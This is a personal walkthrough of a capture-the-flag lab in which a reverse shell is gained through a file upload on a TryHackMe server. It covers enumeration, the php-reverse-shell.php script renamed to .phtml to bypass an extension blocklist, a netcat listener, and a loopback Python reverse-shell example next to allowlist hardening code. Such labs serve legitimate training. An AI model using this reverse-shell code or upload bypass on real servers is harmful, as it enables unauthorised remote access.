Lab 41 – Getting a reverse shell on a server through a file upload
Last updated
Lab Objective:
Learn how to get a reverse shell on a vulnerable server through a file upload.
Lab Purpose:
A shell account is a user account on a remote server. This user account will usually give the user access to a shell via a command-line interface protocol such as telnet or SSH. Getting a shell on a server is usually the first main goal of an attacker when they are looking to hack into a server. From this position, they can navigate around your server and escalate their privileges to take over the server entirely.
Lab Tool:
Kali Linux
Lab Topology:
You can use a Windows machine or Kali Linux in a VM for this lab.
What is a reverse shell ?
A reverse shell is a remote-access technique, used in penetration testing and by real attackers, in which the target machine opens an outbound connection to a listener the attacker controls and then attaches a shell (for example /bin/sh) to that connection, so whatever the attacker types is executed on the target. SSH (Secure Shell) into a target machine is not a reverse shell. Both give remote command-line access, but they differ in direction, purpose and security mechanisms: with SSH the attacker connects inbound to a service the target deliberately runs, authenticates, and the session is encrypted; with a reverse shell the target connects outward (which is why it works even when inbound connections are firewalled), there is no authentication, and the traffic is usually plaintext.
What is a shell account ?
A shell account is a user account on a remote server that provides access to a command-line interface (CLI), typically through a shell like Bash, Zsh, or another Unix shell. The primary purpose of a shell account is to allow users to interact with the operating system of the remote server through text-based commands.
What is a remote server ?
Assume that:
A is the attacker.
B is the compromised web server.
The term "remote server" generally refers to a computer or system that is being accessed over a network from another computer. The "remote" part implies that the server is not local to the person or system accessing it. Depending on the perspective, either A or B could be considered the "remote server."
Explanation:
From the Attacker's Perspective (A):
Remote Server: In this case, B (the compromised web server) is the remote server because it is the system that A (the attacker) is accessing over the network after penetration. The attacker’s local machine (A) is connecting to B to execute commands or perform other actions.
From the Compromised Server's Perspective (B):
Remote Server: From B's point of view, A’s machine could be considered the remote server, especially if B initiates a reverse shell back to A. In this situation, B connects to A’s machine, and A becomes the remote server that B is communicating with.
Detailed Scenario:
Scenario 1: Traditional Access (e.g., via SSH or direct access)
A (the attacker) uses SSH to connect to B (the web server). In this scenario, B is the remote server from A's perspective. A initiates the connection, and B is the server being accessed remotely.
Scenario 2: Reverse Shell
A (the attacker) has exploited a vulnerability on B (the web server) and sets up a reverse shell. B then initiates a connection back to A's machine. In this scenario, A’s machine could be considered the remote server from B's perspective because B is connecting out to A.
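Scenario 2 in code, as an added example that is not part of the original lab, of the 101labs walkthrough, or of Kali's php-reverse-shell.php. Both sides run in one process over 127.0.0.1 so the exchange can be executed offline: the "attacker" side only listens (the role netcat plays later in this lab), the "target" side dials out to it and then runs every command line it receives through /bin/sh. Two things are my assumptions rather than the lab's: /bin/sh is available, and replies are length-prefixed so the listener knows where each command's output ends (real reverse shells such as php-reverse-shell.php just stream raw bytes and leave that to the human at the keyboard).

```python
"""Reverse shell round trip on loopback (added example, not the lab's code).

A (attacker) binds a listener and waits. B (target) opens the TCP connection
outward to A, reads command lines from it, runs each through /bin/sh and
writes the output back. In the lab, B is the uploaded PHP script being
requested in the browser and A is `nc -lvnp <port>`.
"""
import socket
import subprocess
import threading


def run_command(cmd: str) -> bytes:
    """Execute one command line via /bin/sh (assumed present), much as
    php-reverse-shell.php does with proc_open."""
    proc = subprocess.run(cmd, shell=True, capture_output=True, timeout=10)
    return proc.stdout + proc.stderr


def connect_back(host: str, port: int) -> None:
    """Target side (B): dial OUT to the attacker's listener and serve commands
    until the attacker sends an empty line."""
    with socket.create_connection((host, port)) as sock:
        reader = sock.makefile("rb")
        for line in reader:
            cmd = line.decode(errors="replace").strip()
            if not cmd:            # empty line: attacker hangs up
                break
            output = run_command(cmd)
            # Length prefix is my framing choice; real shells stream raw bytes.
            sock.sendall(len(output).to_bytes(4, "big") + output)


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes (a single recv() may return fewer)."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("target closed the connection")
        buf += chunk
    return buf


def reverse_shell_session(commands: list[str]) -> tuple[int, list[bytes]]:
    """Attacker side (A): the equivalent of `nc -lvnp <port>` plus typing commands.

    Binds a listener on a free loopback port, starts a simulated target that
    connects back, sends each command and collects its output. Returns the
    port that was used and the replies in order.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))      # port 0: the OS picks a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    # Simulated victim. In the lab this step is you clicking the uploaded
    # .phtml in /uploads, which makes Apache run it and open this connection.
    victim = threading.Thread(target=connect_back, args=("127.0.0.1", port), daemon=True)
    victim.start()

    listener.settimeout(10)
    conn, _ = listener.accept()          # B connected to us; we never connected to B
    conn.settimeout(10)
    replies = []
    with conn:
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            size = int.from_bytes(recv_exact(conn, 4), "big")
            replies.append(recv_exact(conn, size))
        conn.sendall(b"\n")              # empty line: tell B to close
    listener.close()
    victim.join(timeout=10)
    return port, replies


if __name__ == "__main__":
    used_port, outputs = reverse_shell_session(["id", "uname -a"])
    print(f"listener was on 127.0.0.1:{used_port}; target connected back to it")
    for out in outputs:
        print(out.decode(errors="replace"), end="")
```

The thing to notice is which side calls connect(): only the target does. That is the whole difference from Scenario 1, and it is why the lab has you start the listener on Kali before triggering the uploaded file.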
In this lab, we'll practise this exploit against a TryHackMe web server, working in a TryHackMe room:
Before anything else, we need a VPN connection to reach this TryHackMe lab. TryHackMe labs are hosted on isolated, private networks; to access the virtual machines (VMs) and other resources in these labs, you need to connect to the TryHackMe network via a VPN.
We'll check that OpenVPN is installed on our Kali machine:
Then go to:
Now, we'll follow the guide provided by 101labs.
"By following the steps shown in the figure above, go up to step 3 and download the OpenVPN client config (clientname.ovpn) file to your Kali machine. Go to the location where you downloaded the file and run this command in a terminal:
sudo openvpn clientname.ovpn
Upon successful connection, follow steps 4 and 5 as shown in the above figure. The IP address here is your address on the client side, and we will use this information later. Write it down."
As you can see in the picture above, there is also this text above the download button:
If you're switching for the first time, you will need to redownload your configuration file. For best performance, please use the server that's geographically closest to you.
So, in my case, I will configure it to "AU-Regular-1".
Now download the configuration file. Once finished, use the terminal to cd to its location and run the command:
You should see "Initialization Sequence Completed" in the terminal, and an IP address in the top-right section of your Kali desktop.
Now leave this terminal alone and don't close it. Open another terminal to work in.
But now my problem has come: on my access web page, I still cannot connect to the server. Why is that? . . .
I did a bit of research and I found this Reddit post.
And there are these answers from the users.
So I tried ifconfig in my terminal.
There's already a new interface, 'tun0'. I think everything should be okay then.
Let's get back to work.
Back to the room:
And click 'Join Room' button.
After scrolling down, you'll see the tasks they provide to complete this room. Now click the 'Start Machine' button.
You can also just click 'Complete' on this first task, since we've finished it already.
Here we go, the most fun part. 101labs state in their walkthrough that:
The first step to any hack like this is to discover which ports are open using nmap.
So we go in our terminal:
After 15 minutes of scanning... there are 2 open ports: 22 (SSH) and 80 (HTTP), which aren't quite interesting. Let's move on to the next step!
We'll use gobuster to enumerate the webserver for any interesting directories.
. . .
While we wait for gobuster, let's answer some of the TryHackMe questions.
For the Apache version, run:
The Apache version is 2.4.29.
Now back to gobuster. It is still running, but we can already see some interesting directories.
The ones we care about are '/uploads' and '/panel'. Let's check them out.
The /uploads directory looks like the directory that stores the files uploaded to the webserver.
There we go: /panel seems to be where we upload the file. Since this lab is about exploiting a file upload, this is our place.
At this point, we can already answer all the Task 2 questions in the TryHackMe room.
Now back to the web page. Let's try uploading some files.
In this scenario, I'll try uploading a file named "test.txt", which I just created. Let's see how it works.
Oh god, I'm sorry but what does that even mean... LOL
Let's check the /uploads directory.
We can see our file right there.
Okay, now we know how it works.
IT'S TIME FOR SOME BAD GUY MOMENT 😈
Kali already ships a file written for exactly this reverse shell purpose.
It is stored at this path: /usr/share/webshells/php/php-reverse-shell.php
We're going to upload this file to the lab's webserver and then use it to get a reverse shell.
We'll copy the file somewhere convenient to work on; in my case, my Desktop:
Now that we have our file, let's check it and see how it works.
So in my terminal, I just casually cat it to see what's inside.
And there's a ton of text. Once again it's time for my good "new" friend, ChatGPT. So I asked ChatGPT how this file works and how an attacker should use it. This is the interesting answer from my friend.
How an Attacker Would Use This Script:
Preparation:
Modify IP and Port: Change the $ip and $port variables to the attacker's IP address and the port they are listening on. This is where the reverse shell will connect back to.
Deploy the Script:
Upload: The attacker must upload the PHP script to a web-accessible directory on the target server. This might be done through a web application vulnerability (e.g., file upload functionality).
Execute: The attacker then needs to trigger the execution of the script. This could be done by accessing the script through a web browser or another method that invokes the PHP interpreter.
Set Up Listener:
The attacker should set up a listener on their own machine to receive the reverse connection. This is done using tools like netcat or nc:
Here, 1234 should match the port number specified in the PHP script.
Gain Access:
Once the PHP script is executed and the connection is established, the attacker will have an interactive shell session on the target server. They can execute commands and interact with the server as if they were logged in directly.
Okay, thank you Chat.
Now let's configure our own IP and port number. You can find them in this part of the file:
I changed the IP to my Kali VPN IP address and left the port number as it was. Save the file and exit.
Okay, now that we know how to work with the file, let's upload it to the webserver!
But this time it's not working; I can't upload the file. Why is that?
There could be many possible reasons, but the 101labs walkthrough suggests it is probably a file extension restriction on the webserver: it may not accept .php files.
There is one other file extension that works similarly to .php: .phtml.
.php vs .phtml
.php: Standard and most commonly used extension for PHP files.
.phtml: Less common and used to suggest a file that is primarily HTML with embedded PHP.
Both extensions are handed to the PHP interpreter on this server, so the choice between them is largely a matter of convention or project-specific standards. On Debian and Ubuntu, the Apache PHP module configuration maps .php, .phar and .phtml to the PHP handler by default, which is why a blocklist that rejects only the literal ".php" extension can be bypassed by renaming the file. A safer upload form uses an allowlist of the extensions it actually expects, and stores uploads under a server-chosen name outside the webroot or in a directory where PHP execution is disabled.
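The two checks side by side, as an added example that is not the TryHackMe target's code and not from 101labs. blocklist_check models the behaviour observed in the lab (".php" refused, ".phtml" accepted); that it is literally what the panel does is my assumption from the symptom, not its real source. apache_would_execute applies the FilesMatch pattern Debian/Ubuntu ship for the Apache PHP module, which is what makes the renamed file run. allowlist_check and storage_name are the hardened form; the allowed-extension set and all file names are constructed for the example.

```python
"""Upload filter: blocklist bypass versus allowlist (added example, not the lab's code)."""
import os
import re
import secrets

# Debian/Ubuntu default in /etc/apache2/mods-available/php*.conf:
#   <FilesMatch ".+\.ph(ar|p|tml)$">  SetHandler application/x-httpd-php
APACHE_PHP_PATTERN = re.compile(r".+\.ph(ar|p|tml)$")

# Extensions this (hypothetical) upload form actually expects.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "txt"}

# Extensions PHP may run under common Apache configs; never allow these anywhere in a name.
PHP_EXTENSIONS = {"php", "phar", "phtml", "phps"}


def apache_would_execute(filename: str) -> bool:
    """True if Apache with the Debian PHP module config would run this file as PHP."""
    return APACHE_PHP_PATTERN.search(os.path.basename(filename)) is not None


def blocklist_check(filename: str) -> bool:
    """Vulnerable: reject only the literal '.php' suffix (modelled on the lab's
    symptom). Returns True when the upload is accepted."""
    return not filename.endswith(".php")


def allowlist_check(filename: str) -> bool:
    """Hardened: accept only known-harmless final extensions, compared
    case-insensitively, and refuse a PHP extension in any position
    ("shell.php.png"): with AddHandler/AddType-style wiring, Apache's
    mod_mime can pick a handler from an inner extension."""
    parts = os.path.basename(filename).lower().split(".")
    if len(parts) < 2 or not parts[0]:      # no extension, or dotfile like .htaccess
        return False
    if any(p in PHP_EXTENSIONS for p in parts[1:]):
        return False
    return parts[-1] in ALLOWED_EXTENSIONS


def storage_name(filename: str) -> str:
    """Server-chosen name for an accepted file: random stem plus the validated
    extension, so the uploader controls neither the stem nor the path."""
    if not allowlist_check(filename):
        raise ValueError("extension not allowed")
    ext = os.path.basename(filename).lower().rsplit(".", 1)[1]
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for name in ["test.txt", "php-reverse-shell.php", "php-reverse-shell.phtml", "shell.php.png"]:
        print(f"{name:26} blocklist={blocklist_check(name)!s:5} "
              f"allowlist={allowlist_check(name)!s:5} apache_runs={apache_would_execute(name)}")
```

Run stand-alone it prints one row per name; the row for php-reverse-shell.phtml is the lab in miniature: accepted by the blocklist, rejected by the allowlist, executed by Apache.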
Let's try changing the file extension of our exploit file.
Okay, now our file should be ready once again. Let's re-upload it.
And it worked this time. Thanks to the 101labs walkthrough.
Let's check the /uploads directory.
There's our exploit file.
Now, be ready to run it. As we already know how the file works, we'll set up a listener on our Kali machine, which the web server will connect back to, by opening another terminal and running:
Okay, things should be ready now. We're going to run the exploit file by clicking it on the /uploads page: requesting the file makes Apache execute it as PHP, and the script then connects back to our listener. Let's click it.
After I clicked it, the page seemed to keep loading. Let's check our listener terminal.
And we have our reverse shell. 😈
This is the end of Lab 41 – Getting a reverse shell on a server through a file upload, from the CompTIA Security+ course at 101labs.net.
But the TryHackMe room is not finished! There's one CTF challenge left right here.
And yes, we're going to capture it.
We're going to run the find command:
And there we found it. Let's cat it.
We captured our flag.
The next lab is about privilege escalation, which is the follow-up to this Lab 41. Let's move on to Lab 42!